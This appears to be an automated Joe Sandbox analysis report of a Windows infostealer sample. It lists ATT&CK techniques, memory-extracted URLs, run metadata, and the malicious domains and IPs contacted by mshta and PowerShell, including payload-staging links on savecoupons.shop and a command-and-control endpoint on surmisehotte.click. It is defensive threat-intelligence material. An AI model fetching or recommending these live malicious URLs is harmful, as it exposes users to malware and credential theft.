Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Name	IP	Active	Malicious	Reputation
surmisehotte.click	104.21.96.1	true	true	unknown
www.google.com	172.217.15.196	true	false	high
journal.liveview.pw	104.21.37.173	true	true	unknown
savecoupons.shop	172.67.223.7	true	true	unknown

Contacted URLs

Name	Malicious	Reputation
grannyejh.lat	true	unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	high
https://surmisehotte.click/api	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b	chrome.exe, 00000009.00000002.57290053748.0000781C02A9C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_	chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299517760.0000781C03710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE	chrome.exe, 00000009.00000002.57294454286.0000781C0313C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/	chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmp	false	high
https://shop.advanceautoparts.com/web/OrderItemDisplay	chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://savecoupons.shop/singl6.mp4t%	powershell.exe, 00000003.00000002.56226345857.0000000008192000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://dns-tunnel-check.googlezip.net/connect	chrome.exe, 00000009.00000002.57298031858.0000781C03578000.00000004.00000800.00020000.00000000.sdmp	false	high
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.zappos.com/cart	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.guitarcenter.com/cart	chrome.exe, 00000009.00000002.57289492959.0000781C02A1B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
http://unisolated.invalid/	chrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://setup.office.com	chrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57303886529.0000781C041E0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.altardstate.com/cart/	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://surmisehotte.click/hur	powershell.exe, 00000008.00000002.57431193652.00000000006C9000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://savecoupons.shop/singl6.mp4...	mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56247007984.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56246272360.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249621751.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://www.adorama.com/als.mvc/cartview	chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)	chrome.exe, 00000009.00000002.57289091865.0000781C02978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285755859.0000781C022DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286086306.0000781C0233C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.bestbuy.com/cart	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://packetstormsecurity.com/files/download/22459/BIOS320.EXEr	chrome.exe, 00000009.00000002.57294454286.0000781C0313C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/14436606/23354	powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp	false	high
https://crbug.com/593024	chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://polymer.github.io/PATENTS.txt	chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.google.com/search?q=autoit	chrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297148446.0000781C03488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296034126.0000781C03378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285101049.0000781C02204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ae.com/us/en/cart	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.llbean.com/webapp/wcs/stores/servlet/LLBShoppingCartDisplay	chrome.exe, 00000009.00000002.57288458289.0000781C027A0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmp	false	high
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 00000009.00000002.57292744916.0000781C02E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299573074.0000781C03720000.00000004.00000800.00020000.00000000.sdmp	false	high
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 00000009.00000002.57291222045.0000781C02C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.gamestop.com/cart/	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.boostmobile.com/cart.html	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://packetstormsecurity.com/	chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295825106.0000781C03324000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.samsclub.com/cart	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com	chrome.exe, 00000009.00000002.57293292277.0000781C02F68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://m.google.com/devicemanagement/data/api	chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	false	high
https://packetstormsecurity.com/files/22459/BIOS320.EXE.htmlndler7	chrome.exe, 00000009.00000002.57288553025.0000781C0286C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57230873141.0000781C02864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228123695.0000781C02868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57231062927.0000781C02868000.00000004.00000800.00020000.00000000.sdmp	false	high
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 00000009.00000002.57292744916.0000781C02E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.overstock.com/cart	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.bloomingdales.com/my-bag	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://gemini.google.com/app?q=	chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 00000009.00000002.57296300869.0000781C033C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://secure.newegg.com/shop/cart	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://secure.eicar.org/eicar.com.txt	chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293972178.0000781C03080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299904492.0000781C037C4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://gemini.google.com/app?q=searchTerms	chrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8	chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295715512.0000781C0330C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57303886529.0000781C041E0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.jcrew.com/checkout/cart	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://uk.search.yahoo.com/search	chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmp	false	high
https://setup.office.com/signin-oidc	chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exe	chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.officedepot.com/cart/shoppingCart.do	chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://googleads.g.doubleclick.net/	chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285823302.0000781C022F0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000009.00000003.57225189488.0000781C03684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228863428.0000781C03684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229281440.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57225142821.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57225344845.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/42266842	chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://lens.google.com/gen204	chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp	false	high
https://surmisehotte.click/H	powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	chrome.exe, 00000009.00000002.57294047139.0000781C0309C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57288401902.0000781C02790000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290053748.0000781C02A9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://savecoupons.shop/	mshta.exe, 00000002.00000003.56233772606.0000000003141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249325888.0000000003142000.00000004.00000020.00020000.00000000.sdmp	true	unknown
https://surmisehotte.click/	powershell.exe, 00000008.00000002.57431193652.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://www.google.com/search?q=at	chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287586656.0000781C025C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285101049.0000781C02204000.00000004.00000800.00020000.00000000.sdmp	false	high
https://googleads.g.doubleclick.net/pagead/html/r20210916/r20110914/zrt_lookup.html?fsb=1#RS-0-&adk=	chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/42263580	chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://apis.google.com	chrome.exe, 00000009.00000002.57287949667.0000781C02681000.00000004.00000800.00020000.00000000.sdmp	false	high
https://savecoupons.shop/singl6.mp4ventindowsINetCookiesL	mshta.exe, 00000002.00000003.56233772606.0000000003141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249325888.0000000003142000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://surmisehotte.click//	powershell.exe, 00000008.00000002.57431193652.00000000006C9000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://polymer.github.io/CONTRIBUTORS.txt	chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.talbots.com/cart	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	false	high
https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=280&slot	chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292	chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.bhphotovideo.com/find/cart.jsp	chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe	chrome.exe, 00000009.00000002.57301057032.0000781C03A42000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57226362545.0000781C037E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299963117.0000781C037F0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.vitalsource.com/cart	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://issuetracker.google.com/292285899	chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295376441.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.carid.com/cart.php	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://savecoupons.shop/singl6.mp4WinSta0	mshta.exe, 00000002.00000002.56249259222.0000000003110000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56248897252.0000000003060000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://www.pokemoncenter.com/cart	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://lens.google.com/v3/upload	chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp	false	high
https://recoveringlib.blogspot.com/	chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://stackoverflow.com/q/2152978/23354	powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp	false	high
https://anglebug.com/42265720	chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://anglebug.com/42264571	chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://lens.google.com/upload	chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.homedepot.com/mycart/home	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://docs.google.com/document/?usp=installed_webapp	chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://beastacademy.com/checkout/cart	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://tr.snapchat.com/cm/i?pid=93f19646-2418-418d-98af-f244ebb7c1cc	chrome.exe, 00000009.00000002.57291479755.0000781C02C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289869509.0000781C02A60000.00000004.00000800.00020000.00000000.sdmp	false	high
https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211	chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.belk.com/shopping-bag/	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.neimanmarcus.com/checkout/cart.jsp	chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://mail.google.com/mail/	chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://myaccount.google.com/shielded-email2B	chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.autoitscript.com/	chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://myshop.amplify.com/cart	chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.brownells.com/aspx/store/cart.aspx	chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/tools/feedback/chrome/__submit	chrome.exe, 00000009.00000002.57287720778.0000781C0264C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223675846.0000781C0264C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXEtall.exe	chrome.exe, 00000009.00000002.57294454286.0000781C0313C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://savecoupons.shop/si	powershell.exe, 00000003.00000002.56226696181.00000000081B9000.00000004.00000020.00020000.00000000.sdmp	true	unknown
https://www.basspro.com/shop/AjaxOrderItemDisplayView	chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.67.223.7	savecoupons.shop	United States	13335	CLOUDFLARENETUS	true
104.21.96.1	surmisehotte.click	United States	13335	CLOUDFLARENETUS	true
104.21.37.173	journal.liveview.pw	United States	13335	CLOUDFLARENETUS	true
172.217.15.196	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.11.20
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579348
Start date and time:	2024-12-21 21:02:33 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowscmdlinecookbook.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.win@26/9@5/7
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 89% Number of executed functions: 177 Number of non-executed functions: 21

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 192.178.50.67, 172.217.2.206, 142.251.107.84, 142.250.217.238, 142.250.217.206, 142.250.189.142, 172.217.3.78
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
Execution Graph export aborted for target mshta.exe, PID 2044 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 2576 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
15:04:41	API Interceptor	81x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
